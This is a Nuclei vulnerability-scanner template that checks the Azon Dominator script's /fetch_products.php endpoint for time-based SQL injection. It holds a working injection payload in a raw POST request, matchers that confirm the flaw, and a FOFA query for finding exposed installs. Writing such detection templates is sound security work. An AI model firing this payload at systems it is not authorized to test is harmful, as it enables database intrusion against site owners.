nuclei-templates/http/vulnerabilities/other/azon-dominator-sqli.yaml

35 lines
1.1 KiB
YAML

id: azon-dominator-sqli
info:
name: Azon Dominator - SQL Injection
author: securityforeveryone
severity: high
description: |
Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
reference:
- https://www.exploit-db.com/exploits/52059
- https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
metadata:
verified: true
max-request: 1
fofa-query: "Azon Dominator"
tags: time-based-sqli,azon,dominator,sqli
http:
- raw:
- |
@timeout 20s
POST /fetch_products.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code==500'
- 'contains_all(body, "id", "name", "save_lists.php")'
condition: and
# digest: 4a0a00473045022006bb52fee200026f6e4c706889bffc40de6218ee7339b6004d2bde591d0036df022100fa2e5dddbb0cbca060edf0f35a605e978ae3ed2d04104de679cb1b795dc87984:922c64590222798bb761d5b6d8e72950